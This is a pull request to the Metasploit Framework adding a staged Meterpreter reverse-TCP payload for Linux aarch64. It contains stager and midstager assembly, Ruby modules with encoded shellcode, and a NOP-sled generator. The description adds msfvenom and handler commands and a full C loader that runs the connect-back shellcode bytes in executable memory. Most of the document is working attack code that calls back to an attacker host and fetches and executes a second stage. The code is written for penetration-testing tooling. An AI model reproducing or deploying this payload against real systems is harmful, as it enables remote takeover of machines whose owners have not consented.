### PR TITLE
Add aarch64 meterpreter stager

### DIFF
--- a/external/source/shellcode/linux/aarch64/stage_mettle.s
+++ b/external/source/shellcode/linux/aarch64/stage_mettle.s
@@ -1,0 +1,137 @@
+.equ SYS_READ, 0x3f
+.equ SYS_MMAP, 0xde
+.equ SYS_EXIT, 0x5d
+
+.equ SIZE, 0xeeeeeeee
+.equ ENTRY, 0xffffffff
+
+start:
+    adr    x2, size
+    ldr    w2, [x2]
+    mov    x10, x2
+
+    /* Page-align, assume <4GB */
+    lsr    x2, x2, #12
+    add    x2, x2, #1
+    lsl    x2, x2, #12
+
+    /* mmap(addr=0, length='x2', prot=7, flags=34, fd=0, offset=0) */
+    mov    x0, xzr
+    mov    x1, x2
+    mov    x2, #7
+    mov    x3, #34
+    mov    x4, xzr
+    mov    x5, xzr
+    mov    x8, SYS_MMAP
+    svc    0
+
+    /* Grab the saved size, save the address */
+    mov    x4, x10
+
+    /* Save the memory address */
+    mov    x3, x0
+    mov    x10, x0
+
+read_loop:
+    /* read(sockfd, buf='x3', nbytes='x4') */
+    mov    x0, x12
+    mov    x1, x3
+    mov    x2, x4
+    mov    x8, SYS_READ
+    svc    0
+    cbz    w0, failed
+    add    x3, x3, x0
+    subs   x4, x4, x0
+    bne    read_loop
+
+    /* set up the initial stack */
+    /*
+
+    add    sp, sp, #80
+    mov    x4, #109
+    eor    x5, x5, x5
+    stp    x4, x5, [sp, #-16]!
+
+    mov x1,#2   
+    mov x2,sp   
+    mov x3,#0   
+
+    mov x4,#2   
+    mov x5,sp   
+    mov x6,x12  
+    mov x7,#0   
+    mov x8,#0   
+    mov x9,#7   
+    mov x10,x10 
+    mov x11,#0  
+    mov x12,#0
+
+    eor x0, x0, x0
+    eor x1, x1, x1
+    eor x2, x2, x2
+    eor x3, x3, x3
+    stp    x4, x5, [sp, #-16]!
+    stp    x6, x7, [sp, #-16]!
+    stp    x7, x8, [sp, #-16]!
+    stp    x9, x10, [sp, #-16]!
+    stp    x11, x12, [sp, #-16]!
+    */
+
+    adr    x0, entry
+    ldr    x0, [x0]
+    // entry_offset + mmap
+    add    x0, x0, x10
+
+    mov    x8, x0
+
+
+    /* Set up the fake stack.
+       For whatever reason, aarch64 binaries really want AT_RANDOM
+       to be available. */
+    /* AT_NULL */
+    eor x0, x0, x0
+    eor x1, x1, x1
+    stp  x0, x1, [sp, #-16]!
+    /* AT_RANDOM */
+    mov x2, #25
+    mov x3, sp
+    stp  x2, x3, [sp, #-16]!
+
+    /* argc, argv[0], argv[1], envp */
+    /* ideally these could all be empty, but unfortunately
+       we have to keep the stack aligned.  it's easier to
+       just push an extra argument than care... */
+    stp  x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */
+    mov  x0, 1
+    mov  x1, sp
+    stp  x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */
+
+    br x8
+
+    /*
+    mov    x0, #109
+    mov    x1, x12
+    stp  x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */
+   /* mov  x0, 2
+    mov  x1, sp
+    stp  x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */
+
+    /*
+    blr    x8
+    */
+
+failed:
+    mov    x0, 0
+    mov    x8, SYS_EXIT
+    svc    0
+
+.balign 16
+size:
+        .word SIZE
+        .word 0
+entry:
+        .word ENTRY
+        .word 0
+m:
+.word 0x0000006d
+.word 0x00000000

--- a/external/source/shellcode/linux/aarch64/stage_mettle.s
+++ b/external/source/shellcode/linux/aarch64/stage_mettle.s
@@ -44,81 +44,48 @@ read_loop:
     subs   x4, x4, x0
     bne    read_loop
 
-    /* set up the initial stack */
-    /*
-
-    add    sp, sp, #80
-    mov    x4, #109
-    eor    x5, x5, x5
-    stp    x4, x5, [sp, #-16]!
-
-    mov x1,#2   
-    mov x2,sp   
-    mov x3,#0   
-
-    mov x4,#2   
-    mov x5,sp   
-    mov x6,x12  
-    mov x7,#0   
-    mov x8,#0   
-    mov x9,#7   
-    mov x10,x10 
-    mov x11,#0  
-    mov x12,#0
-
-    eor x0, x0, x0
-    eor x1, x1, x1
-    eor x2, x2, x2
-    eor x3, x3, x3
-    stp    x4, x5, [sp, #-16]!
-    stp    x6, x7, [sp, #-16]!
-    stp    x7, x8, [sp, #-16]!
-    stp    x9, x10, [sp, #-16]!
-    stp    x11, x12, [sp, #-16]!
-    */
-
+    /* add entry_offset */
     adr    x0, entry
     ldr    x0, [x0]
-    // entry_offset + mmap
     add    x0, x0, x10
+    mov    x14, x0
 
-    mov    x8, x0
+    /* set up the initial stack */
+    mov    x0, sp
+    and    sp, x0, #-16
+    add    sp, sp, #(16 * 6)
 
+    /* argc = 2, argv[0] = 'm' */
+    mov    x0, #2
+    mov    x1, #109
+    str    x1, [sp]
+    mov    x1, sp
+    stp    x0, x1, [sp, #-16]!
 
-    /* Set up the fake stack.
-       For whatever reason, aarch64 binaries really want AT_RANDOM
-       to be available. */
-    /* AT_NULL */
-    eor x0, x0, x0
-    eor x1, x1, x1
-    stp  x0, x1, [sp, #-16]!
-    /* AT_RANDOM */
-    mov x2, #25
-    mov x3, sp
-    stp  x2, x3, [sp, #-16]!
+    /* argc = 2, argv[1] = 'x12 (sockfd)' */
+    mov    x2, x12
+    mov    x3, 0
+    stp    x2, x3, [sp, #-16]!
 
-    /* argc, argv[0], argv[1], envp */
-    /* ideally these could all be empty, but unfortunately
-       we have to keep the stack aligned.  it's easier to
-       just push an extra argument than care... */
-    stp  x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */
-    mov  x0, 1
-    mov  x1, sp
-    stp  x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */
+    mov    x4, 0
+    mov    x5, #7 /* AT_BASE */
+    stp    x4, x5, [sp, #-16]!
 
-    br x8
+    mov    x6, x10
+    mov    x7, #6 /* AT_PAGESZ */
+    stp    x6, x7, [sp, #-16]!
 
-    /*
-    mov    x0, #109
-    mov    x1, x12
-    stp  x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */
-   /* mov  x0, 2
-    mov  x1, sp
-    stp  x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */
+    mov    x8, #0x1000
+    mov    x9, #25 /* AT_RANDOM */
+    stp    x8, x9, [sp, #-16]!
 
-    /*
-    blr    x8
-    */
+    mov    x10, x10
+    mov    x11, #0 /* AT_NULL */
+    stp    x10, x11, [sp, #-16]!
+
+    mov    x29, #0
+    mov    x30, #0
+    br     x14
 
 failed:
     mov    x0, 0
@@ -132,6 +99,3 @@ size:
 entry:
         .word ENTRY
         .word 0
-m:
-.word 0x0000006d
-.word 0x00000000

--- a/external/source/shellcode/linux/aarch64/stage_mettle.s
+++ b/external/source/shellcode/linux/aarch64/stage_mettle.s
@@ -60,28 +60,28 @@ read_loop:
     mov    x1, #109
     str    x1, [sp]
     mov    x1, sp
-    stp    x0, x1, [sp, #-16]!
 
-    /* argc = 2, argv[1] = 'x12 (sockfd)' */
     mov    x2, x12
     mov    x3, 0
-    stp    x2, x3, [sp, #-16]!
 
     mov    x4, 0
     mov    x5, #7 /* AT_BASE */
-    stp    x4, x5, [sp, #-16]!
 
     mov    x6, x10
     mov    x7, #6 /* AT_PAGESZ */
-    stp    x6, x7, [sp, #-16]!
 
     mov    x8, #0x1000
     mov    x9, #25 /* AT_RANDOM */
-    stp    x8, x9, [sp, #-16]!
 
     mov    x10, x10
     mov    x11, #0 /* AT_NULL */
+
     stp    x10, x11, [sp, #-16]!
+    stp    x8, x9, [sp, #-16]!
+    stp    x6, x7, [sp, #-16]!
+    stp    x4, x5, [sp, #-16]!
+    stp    x2, x3, [sp, #-16]!
+    stp    x0, x1, [sp, #-16]!
 
     mov    x29, #0
     mov    x30, #0

--- a/external/source/shellcode/linux/aarch64/stage_mettle.s
+++ b/external/source/shellcode/linux/aarch64/stage_mettle.s
@@ -2,9 +2,6 @@
 .equ SYS_MMAP, 0xde
 .equ SYS_EXIT, 0x5d
 
-.equ SIZE, 0xeeeeeeee
-.equ ENTRY, 0xffffffff
-
 start:
     adr    x2, size
     ldr    w2, [x2]
@@ -94,8 +91,8 @@ failed:
 
 .balign 16
 size:
-        .word SIZE
+        .word 0
         .word 0
 entry:
-        .word ENTRY
+        .word 0
         .word 0

--- a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
@@ -37,7 +37,7 @@ start:
     mov    x2, #4
     mov    x8, SYS_READ
     svc    0
-    cmn	   x0, #0x1
+    cmn    x0, #0x1
     beq    failed
 
     ldr    w2, [sp,#0]
@@ -56,7 +56,7 @@ start:
     mov    x5, xzr
     mov    x8, SYS_MMAP
     svc    0
-    cmn	   x0, #0x1
+    cmn    x0, #0x1
     beq    failed
 
     /* Grab the saved size, save the address */
@@ -75,7 +75,7 @@ read_loop:
     mov    x2, x4
     mov    x8, SYS_READ
     svc    0
-    cmn	   x0, #0x1
+    cmn    x0, #0x1
     beq    failed
     add    x3, x3, x0
     subs   x4, x4, x0

--- a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
@@ -37,9 +37,10 @@ start:
     mov    x2, #4
     mov    x8, SYS_READ
     svc    0
-    cbz    w0, failed
+    cmn	   x0, #0x1
+    beq    failed
 
-    ldr    x2, [sp,#0]
+    ldr    w2, [sp,#0]
 
     /* Page-align, assume <4GB */
     lsr    x2, x2, #12
@@ -53,12 +54,13 @@ start:
     mov    x3, #34
     mov    x4, xzr
     mov    x5, xzr
-    /* call mmap() */
-    movi   x8, SYS_MMAP
+    mov    x8, SYS_MMAP
     svc    0
+    cmn	   x0, #0x1
+    beq    failed
 
     /* Grab the saved size, save the address */
-    ldr    x4, [sp]
+    ldr    w4, [sp]
 
     /* Save the memory address */
     str    x0, [sp]
@@ -73,13 +75,15 @@ read_loop:
     mov    x2, x4
     mov    x8, SYS_READ
     svc    0
+    cmn	   x0, #0x1
+    beq    failed
     add    x3, x3, x0
     subs   x4, x4, x0
     bne    read_loop
 
     /* Go to shellcode */
-    ldr    x30, [sp]
-    ret
+    ldr    x0, [sp]
+    blr    x0
 
 failed:
     mov    x0, 0

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -165,6 +165,14 @@ require 'msf/core/exe/segment_appender'
       # XXX: Add remaining ARMLE systems here
     end
 
+    if arch.index(ARCH_AARCH64)
+      if plat.index(Msf::Module::Platform::Linux)
+        return to_linux_aarch64_elf(framework, code)
+      end
+
+      # XXX: Add remaining AARCH64 systems here
+    end
+
     if arch.index(ARCH_PPC)
       if plat.index(Msf::Module::Platform::OSX)
         return to_osx_ppc_macho(framework, code)

--- a/modules/nops/aarch64/simple.rb
+++ b/modules/nops/aarch64/simple.rb
@@ -1,0 +1,43 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+###
+#
+# SingleByte
+# ----------
+#
+# This class implements simple NOP generator for AARCH64
+#
+###
+class MetasploitModule < Msf::Nop
+
+  def initialize
+    super(
+      'Name'        => 'Simple',
+      'Alias'       => 'armle_simple',
+      'Description' => 'Simple NOP generator',
+      'License'     => MSF_LICENSE,
+      'Arch'        => ARCH_AARCH64)
+    register_advanced_options(
+      [
+        OptBool.new('RandomNops', [ false, "Generate a random NOP sled", true ])
+      ])
+  end
+
+  def generate_sled(length, opts)
+    random   = opts['Random']   || datastore['RandomNops']
+    nops = [
+      0xd503201f,          #  nop
+      0xaa0103e1,          #  mov	x1, x1
+      0xaa0203e2,          #  mov	x2, x2
+      0x2a0303e3,          #  mov	w3, w3
+      0x2a0403e4,          #  mov	w4, w4
+    ]
+    if random
+      return ([nops[rand(nops.length)]].pack("V*") * (length/4))
+    end
+    return ([nops[0]].pack("V*") * (length/4))
+  end
+end

--- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
@@ -17,7 +17,7 @@ require 'msf/core/handler/reverse_tcp'
 ###
 module MetasploitModule
 
-  CachedSize = 192
+  CachedSize = 212
 
   include Msf::Payload::Stager
 

--- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
@@ -33,8 +33,8 @@ module MetasploitModule
         {
           'Offsets' =>
             {
-              'LPORT' => [ 186, 'n'    ],
-              'LHOST' => [ 188, 'ADDR' ],
+              'LPORT' => [ 206, 'n'    ],
+              'LHOST' => [ 208, 'ADDR' ],
             },
           'Payload' =>
           [
@@ -45,19 +45,20 @@ module MetasploitModule
             0xd28018c8,          #  mov	x8, #0xc6                  	// #198
             0xd4000001,          #  svc	#0x0
             0xaa0003ec,          #  mov	x12, x0
-            0x10000501,          #  adr	x1, b8 <sockaddr>
+            0x100005a1,          #  adr	x1, cc <sockaddr>
             0xd2800202,          #  mov	x2, #0x10                  	// #16
             0xd2801968,          #  mov	x8, #0xcb                  	// #203
             0xd4000001,          #  svc	#0x0
-            0x35000420,          #  cbnz	w0, ac <failed>
+            0x350004c0,          #  cbnz	w0, c0 <failed>
             0xaa0c03e0,          #  mov	x0, x12
             0xd10043ff,          #  sub	sp, sp, #0x10
             0x910003e1,          #  mov	x1, sp
             0xd2800082,          #  mov	x2, #0x4                   	// #4
             0xd28007e8,          #  mov	x8, #0x3f                  	// #63
             0xd4000001,          #  svc	#0x0
-            0x34000340,          #  cbz	w0, ac <failed>
-            0xf94003e2,          #  ldr	x2, [sp]
+            0xb100041f,          #  cmn	x0, #0x1
+            0x540003c0,          #  b.eq	c0 <failed>
+            0xb94003e2,          #  ldr	w2, [sp]
             0xd34cfc42,          #  lsr	x2, x2, #12
             0x91000442,          #  add	x2, x2, #0x1
             0xd374cc42,          #  lsl	x2, x2, #12
@@ -69,7 +70,9 @@ module MetasploitModule
             0xaa1f03e5,          #  mov	x5, xzr
             0xd2801bc8,          #  mov	x8, #0xde                  	// #222
             0xd4000001,          #  svc	#0x0
-            0xf94003e4,          #  ldr	x4, [sp]
+            0xb100041f,          #  cmn	x0, #0x1
+            0x54000200,          #  b.eq	c0 <failed>
+            0xb94003e4,          #  ldr	w4, [sp]
             0xf90003e0,          #  str	x0, [sp]
             0xaa0003e3,          #  mov	x3, x0
             0xaa0c03e0,          #  mov	x0, x12
@@ -77,11 +80,13 @@ module MetasploitModule
             0xaa0403e2,          #  mov	x2, x4
             0xd28007e8,          #  mov	x8, #0x3f                  	// #63
             0xd4000001,          #  svc	#0x0
+            0xb100041f,          #  cmn	x0, #0x1
+            0x540000c0,          #  b.eq	c0 <failed>
             0x8b000063,          #  add	x3, x3, x0
             0xeb000084,          #  subs	x4, x4, x0
-            0x54ffff21,          #  b.ne	84 <read_loop>
-            0xf94003fe,          #  ldr	x30, [sp]
-            0xd65f03c0,          #  ret
+            0x54fffee1,          #  b.ne	90 <read_loop>
+            0xf94003e0,          #  ldr	x0, [sp]
+            0xd63f0000,          #  blr	x0
             0xd2800000,          #  mov	x0, #0x0                   	// #0
             0xd2800ba8,          #  mov	x8, #0x5d                  	// #93
             0xd4000001,          #  svc	#0x0

--- a/modules/payloads/stages/linux/aarch64/meterpreter.rb
+++ b/modules/payloads/stages/linux/aarch64/meterpreter.rb
@@ -40,7 +40,6 @@ module MetasploitModule
     # Generated from external/source/shellcode/linux/aarch64/stage_mettle.s
     midstager = [
 
-
             0x10000782,          #  adr	x2, f0 <size>
             0xb9400042,          #  ldr	w2, [x2]
             0xaa0203ea,          #  mov	x10, x2
@@ -78,22 +77,22 @@ module MetasploitModule
             0xd2800da1,          #  mov	x1, #0x6d                  	// #109
             0xf90003e1,          #  str	x1, [sp]
             0x910003e1,          #  mov	x1, sp
-            0xa9bf07e0,          #  stp	x0, x1, [sp,#-16]!
             0xaa0c03e2,          #  mov	x2, x12
             0xd2800003,          #  mov	x3, #0x0                   	// #0
-            0xa9bf0fe2,          #  stp	x2, x3, [sp,#-16]!
             0xd2800004,          #  mov	x4, #0x0                   	// #0
             0xd28000e5,          #  mov	x5, #0x7                   	// #7
-            0xa9bf17e4,          #  stp	x4, x5, [sp,#-16]!
             0xaa0a03e6,          #  mov	x6, x10
             0xd28000c7,          #  mov	x7, #0x6                   	// #6
-            0xa9bf1fe6,          #  stp	x6, x7, [sp,#-16]!
             0xd2820008,          #  mov	x8, #0x1000                	// #4096
             0xd2800329,          #  mov	x9, #0x19                  	// #25
-            0xa9bf27e8,          #  stp	x8, x9, [sp,#-16]!
             0xaa0a03ea,          #  mov	x10, x10
             0xd280000b,          #  mov	x11, #0x0                   	// #0
             0xa9bf2fea,          #  stp	x10, x11, [sp,#-16]!
+            0xa9bf27e8,          #  stp	x8, x9, [sp,#-16]!
+            0xa9bf1fe6,          #  stp	x6, x7, [sp,#-16]!
+            0xa9bf17e4,          #  stp	x4, x5, [sp,#-16]!
+            0xa9bf0fe2,          #  stp	x2, x3, [sp,#-16]!
+            0xa9bf07e0,          #  stp	x0, x1, [sp,#-16]!
             0xd280001d,          #  mov	x29, #0x0                   	// #0
             0xd280001e,          #  mov	x30, #0x0                   	// #0
             0xd61f01c0,          #  br	x14
@@ -101,7 +100,6 @@ module MetasploitModule
             0xd2800ba8,          #  mov	x8, #0x5d                  	// #93
             0xd4000001,          #  svc	#0x0
             0xd503201f,          #  nop
-
             payload.length,
             0x00000000,          #  .word	0x00000000
             entry_offset,
@@ -109,7 +107,6 @@ module MetasploitModule
         ].pack('V*')
 
     print_status("Transmitting intermediate midstager...(#{midstager.length} bytes)")
-    print_status("Transmitting intermediate paystager...(#{payload.length} bytes)")
     conn.put([midstager.length].pack('V'))
     conn.put(midstager) == midstager.length
   end

--- a/modules/payloads/stages/linux/aarch64/meterpreter.rb
+++ b/modules/payloads/stages/linux/aarch64/meterpreter.rb
@@ -1,0 +1,109 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/base/sessions/meterpreter_aarch64_linux'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'rex/elfparsey'
+
+module MetasploitModule
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Linux Meterpreter',
+        'Description'   => 'Inject the mettle server payload (staged)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>'
+        ],
+        'Platform'      => 'linux',
+        'Arch'          => ARCH_AARCH64,
+        'License'       => MSF_LICENSE,
+        'Session'       => Msf::Sessions::Meterpreter_aarch64_Linux
+      )
+    )
+  end
+
+  def elf_ep(payload)
+    elf = Rex::ElfParsey::Elf.new(Rex::ImageSource::Memory.new(payload))
+    elf.elf_header.e_entry
+  end
+
+  def handle_intermediate_stage(conn, payload)
+    entry_offset = elf_ep(payload)
+
+    # Generated from external/source/shellcode/linux/aarch64/stage_mettle.s
+    midstager = [
+
+
+
+            0x10000582,          #  adr	x2, b0 <size>
+            0xb9400042,          #  ldr	w2, [x2]
+            0xaa0203ea,          #  mov	x10, x2
+            0xd34cfc42,          #  lsr	x2, x2, #12
+            0x91000442,          #  add	x2, x2, #0x1
+            0xd374cc42,          #  lsl	x2, x2, #12
+            0xaa1f03e0,          #  mov	x0, xzr
+            0xaa0203e1,          #  mov	x1, x2
+            0xd28000e2,          #  mov	x2, #0x7                   	// #7
+            0xd2800443,          #  mov	x3, #0x22                  	// #34
+            0xaa1f03e4,          #  mov	x4, xzr
+            0xaa1f03e5,          #  mov	x5, xzr
+            0xd2801bc8,          #  mov	x8, #0xde                  	// #222
+            0xd4000001,          #  svc	#0x0
+            0xaa0a03e4,          #  mov	x4, x10
+            0xaa0003e3,          #  mov	x3, x0
+            0xaa0003ea,          #  mov	x10, x0
+            0xaa0c03e0,          #  mov	x0, x12
+            0xaa0303e1,          #  mov	x1, x3
+            0xaa0403e2,          #  mov	x2, x4
+            0xd28007e8,          #  mov	x8, #0x3f                  	// #63
+            0xd4000001,          #  svc	#0x0
+            0x34000260,          #  cbz	w0, a4 <failed>
+            0x8b000063,          #  add	x3, x3, x0
+            0xeb000084,          #  subs	x4, x4, x0
+            0x54ffff01,          #  b.ne	44 <read_loop>
+            0x10000280,          #  adr	x0, b8 <entry>
+            0xf9400000,          #  ldr	x0, [x0]
+            0x8b0a0000,          #  add	x0, x0, x10
+            0xaa0003e8,          #  mov	x8, x0
+            0xca000000,          #  eor	x0, x0, x0
+            0xca010021,          #  eor	x1, x1, x1
+            0xa9bf07e0,          #  stp	x0, x1, [sp,#-16]!
+            0xd2800322,          #  mov	x2, #0x19                  	// #25
+            0x910003e3,          #  mov	x3, sp
+            0xa9bf0fe2,          #  stp	x2, x3, [sp,#-16]!
+            0xa9bf07e0,          #  stp	x0, x1, [sp,#-16]!
+            0xd2800020,          #  mov	x0, #0x1                   	// #1
+            0x910003e1,          #  mov	x1, sp
+            0xa9bf07e0,          #  stp	x0, x1, [sp,#-16]!
+            0xd61f0100,          #  br	x8
+            0xd2800000,          #  mov	x0, #0x0                   	// #0
+            0xd2800ba8,          #  mov	x8, #0x5d                  	// #93
+            0xd4000001,          #  svc	#0x0
+            payload.length,
+            0x00000000,          #  .word	0x00000000
+            entry_offset,
+            0x00000000,          #  .word	0x00000000
+            0x0000006d,          #  .word	0x0000006d
+            0x00000000,          #  .word	0x00000000
+            0xd503201f,          #  nop
+            0xd503201f,          #  nop
+        ].pack('V*')
+
+    print_status("Transmitting intermediate midstager...(#{midstager.length} bytes)")
+    print_status("Transmitting intermediate paystager...(#{payload.length} bytes)")
+    conn.put([midstager.length].pack('V'))
+    conn.put(midstager) == midstager.length
+  end
+
+  def generate_stage(opts = {})
+    MetasploitPayloads::Mettle.new('aarch64-linux-musl',
+      generate_config(opts.merge({scheme: 'tcp'}))).to_binary :process_image
+  end
+end

--- a/modules/payloads/stages/linux/aarch64/meterpreter.rb
+++ b/modules/payloads/stages/linux/aarch64/meterpreter.rb
@@ -41,8 +41,7 @@ module MetasploitModule
     midstager = [
 
 
-
-            0x10000582,          #  adr	x2, b0 <size>
+            0x10000782,          #  adr	x2, f0 <size>
             0xb9400042,          #  ldr	w2, [x2]
             0xaa0203ea,          #  mov	x10, x2
             0xd34cfc42,          #  lsr	x2, x2, #12
@@ -64,36 +63,49 @@ module MetasploitModule
             0xaa0403e2,          #  mov	x2, x4
             0xd28007e8,          #  mov	x8, #0x3f                  	// #63
             0xd4000001,          #  svc	#0x0
-            0x34000260,          #  cbz	w0, a4 <failed>
+            0x34000440,          #  cbz	w0, e0 <failed>
             0x8b000063,          #  add	x3, x3, x0
             0xeb000084,          #  subs	x4, x4, x0
             0x54ffff01,          #  b.ne	44 <read_loop>
-            0x10000280,          #  adr	x0, b8 <entry>
+            0x10000480,          #  adr	x0, f8 <entry>
             0xf9400000,          #  ldr	x0, [x0]
             0x8b0a0000,          #  add	x0, x0, x10
-            0xaa0003e8,          #  mov	x8, x0
-            0xca000000,          #  eor	x0, x0, x0
-            0xca010021,          #  eor	x1, x1, x1
-            0xa9bf07e0,          #  stp	x0, x1, [sp,#-16]!
-            0xd2800322,          #  mov	x2, #0x19                  	// #25
-            0x910003e3,          #  mov	x3, sp
-            0xa9bf0fe2,          #  stp	x2, x3, [sp,#-16]!
-            0xa9bf07e0,          #  stp	x0, x1, [sp,#-16]!
-            0xd2800020,          #  mov	x0, #0x1                   	// #1
+            0xaa0003ee,          #  mov	x14, x0
+            0x910003e0,          #  mov	x0, sp
+            0x927cec1f,          #  and	sp, x0, #0xfffffffffffffff0
+            0x910183ff,          #  add	sp, sp, #0x60
+            0xd2800040,          #  mov	x0, #0x2                   	// #2
+            0xd2800da1,          #  mov	x1, #0x6d                  	// #109
+            0xf90003e1,          #  str	x1, [sp]
             0x910003e1,          #  mov	x1, sp
             0xa9bf07e0,          #  stp	x0, x1, [sp,#-16]!
-            0xd61f0100,          #  br	x8
+            0xaa0c03e2,          #  mov	x2, x12
+            0xd2800003,          #  mov	x3, #0x0                   	// #0
+            0xa9bf0fe2,          #  stp	x2, x3, [sp,#-16]!
+            0xd2800004,          #  mov	x4, #0x0                   	// #0
+            0xd28000e5,          #  mov	x5, #0x7                   	// #7
+            0xa9bf17e4,          #  stp	x4, x5, [sp,#-16]!
+            0xaa0a03e6,          #  mov	x6, x10
+            0xd28000c7,          #  mov	x7, #0x6                   	// #6
+            0xa9bf1fe6,          #  stp	x6, x7, [sp,#-16]!
+            0xd2820008,          #  mov	x8, #0x1000                	// #4096
+            0xd2800329,          #  mov	x9, #0x19                  	// #25
+            0xa9bf27e8,          #  stp	x8, x9, [sp,#-16]!
+            0xaa0a03ea,          #  mov	x10, x10
+            0xd280000b,          #  mov	x11, #0x0                   	// #0
+            0xa9bf2fea,          #  stp	x10, x11, [sp,#-16]!
+            0xd280001d,          #  mov	x29, #0x0                   	// #0
+            0xd280001e,          #  mov	x30, #0x0                   	// #0
+            0xd61f01c0,          #  br	x14
             0xd2800000,          #  mov	x0, #0x0                   	// #0
             0xd2800ba8,          #  mov	x8, #0x5d                  	// #93
             0xd4000001,          #  svc	#0x0
+            0xd503201f,          #  nop
+
             payload.length,
             0x00000000,          #  .word	0x00000000
             entry_offset,
             0x00000000,          #  .word	0x00000000
-            0x0000006d,          #  .word	0x0000006d
-            0x00000000,          #  .word	0x00000000
-            0xd503201f,          #  nop
-            0xd503201f,          #  nop
         ].pack('V*')
 
     print_status("Transmitting intermediate midstager...(#{midstager.length} bytes)")

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -4442,6 +4442,17 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'linux/zarch/meterpreter_reverse_https'
   end
 
+  context 'linux/aarch64/meterpreter/reverse_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'stagers/linux/aarch64/reverse_tcp',
+                            'stages/linux/aarch64/meterpreter'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/aarch64/meterpreter/reverse_tcp'
+  end
+
   context 'linux/aarch64/meterpreter_reverse_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [


### PR DESCRIPTION
Add a stager for linux aarch64.
```
msfvenom -p linux/aarch64/meterpreter/reverse_tcp LHOST=$LHOST LPORT=4444 -f elf -o arm64.elf
msfconsole -qx "use exploit/multi/handler; setg VERBOSE true; set payload linux/aarch64/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"
```
You can avoid the msfvenom aarch64 only works as root issue (described here: https://github.com/rapid7/metasploit-framework/pull/8842) if you use the following c template:
```
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>

char shellcode[] =
// Output of: msfvenom -p linux/aarch64/meterpreter/reverse_tcp LHOST=$LHOST LPORT=4444 -f c
"\x40\x00\x80\xd2\x21\x00\x80\xd2\x02\x00\x80\xd2\xc8\x18\x80"
"\xd2\x01\x00\x00\xd4\xec\x03\x00\xaa\xa1\x05\x00\x10\x02\x02"
"\x80\xd2\x68\x19\x80\xd2\x01\x00\x00\xd4\xc0\x04\x00\x35\xe0"
"\x03\x0c\xaa\xff\x43\x00\xd1\xe1\x03\x00\x91\x82\x00\x80\xd2"
"\xe8\x07\x80\xd2\x01\x00\x00\xd4\x1f\x04\x00\xb1\xc0\x03\x00"
"\x54\xe2\x03\x40\xb9\x42\xfc\x4c\xd3\x42\x04\x00\x91\x42\xcc"
"\x74\xd3\xe0\x03\x1f\xaa\xe1\x03\x02\xaa\xe2\x00\x80\xd2\x43"
"\x04\x80\xd2\xe4\x03\x1f\xaa\xe5\x03\x1f\xaa\xc8\x1b\x80\xd2"
"\x01\x00\x00\xd4\x1f\x04\x00\xb1\x00\x02\x00\x54\xe4\x03\x40"
"\xb9\xe0\x03\x00\xf9\xe3\x03\x00\xaa\xe0\x03\x0c\xaa\xe1\x03"
"\x03\xaa\xe2\x03\x04\xaa\xe8\x07\x80\xd2\x01\x00\x00\xd4\x1f"
"\x04\x00\xb1\xc0\x00\x00\x54\x63\x00\x00\x8b\x84\x00\x00\xeb"
"\xe1\xfe\xff\x54\xe0\x03\x40\xf9\x00\x00\x3f\xd6\x00\x00\x80"
"\xd2\xa8\x0b\x80\xd2\x01\x00\x00\xd4\x02\x00\x11\x5c\xc0\xa8"
"\x1e\x79";

int main(int argc, char **argv) {

    void *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);

    if(ptr == MAP_FAILED)
    {
     perror("mmap");
     exit(-1);
    }

    memcpy(ptr, shellcode, sizeof(shellcode));

    int (*sc)();
    sc = ptr;
    sc();

    return 0;
}
```

